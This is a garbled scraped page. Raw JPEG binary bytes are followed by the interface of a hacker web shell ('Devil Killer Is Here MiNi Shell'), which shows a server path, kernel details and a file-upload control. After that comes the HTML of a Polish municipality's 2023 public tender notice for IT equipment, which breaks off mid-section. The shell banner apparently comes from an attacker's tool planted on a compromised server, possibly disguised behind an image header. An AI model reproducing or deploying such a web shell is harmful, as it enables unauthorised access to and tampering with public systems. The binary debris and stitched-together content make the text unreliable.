JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230614/0025924201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu i oprogramowania w ramach projektu „Cyfrowa Gmina” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Aleksandrowa Kujawskiego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słowackiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Aleksandrów Kujawski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@aleksandrowkujawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.aleksandrowkujawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu i oprogramowania w ramach projektu „Cyfrowa Gmina” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dbb7ab9b-0a9b-11ee-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00259242</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00089119/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa sprzętu i oprogramowania - Cyfrowa Gmina</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Operacyjny Polska Cyfrowa na lata 2014-2020 Osi Priorytetowej V Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia REACT-EU działania 5.1 Rozwój cyfrowy JST oraz wzmocnienie cyfrowej odporności na zagrożenia dotycząca realizacji projektu grantowego „Cyfrowa Gmina” o numerze POPC.05.01.00-00-0001/21-00. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miejski Aleksandrowa Kujawskiego reprezentowany przez Burmistrza Miasta, z siedzibą w Aleksandrowie Kujawskim przy ul. Słowackiego 8, 87-700 Aleksandrów Kujawski, z którą można kontaktować się pisemnie na adres siedziby lub poprzez adres e-mail: sekretariat@aleksandrowkujawski.pl lub telefonicznie pod nr 58 282 68 20.<br/>2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iodo@aleksandrowkujawski.pl.<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy p.z.p.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia); <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2023.I</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 1 Dostawa urządzenia sieciowego Ubiquity model US-48-G1 wraz z wkładką FC<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 2 Dostawa specjalistycznego oprogramowania do zarządzania i monitoringu<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72268000-1 - Usługi dostawy oprogramowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <p class="mb-0">48517000-5 - Pakiety oprogramowania informatycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 3 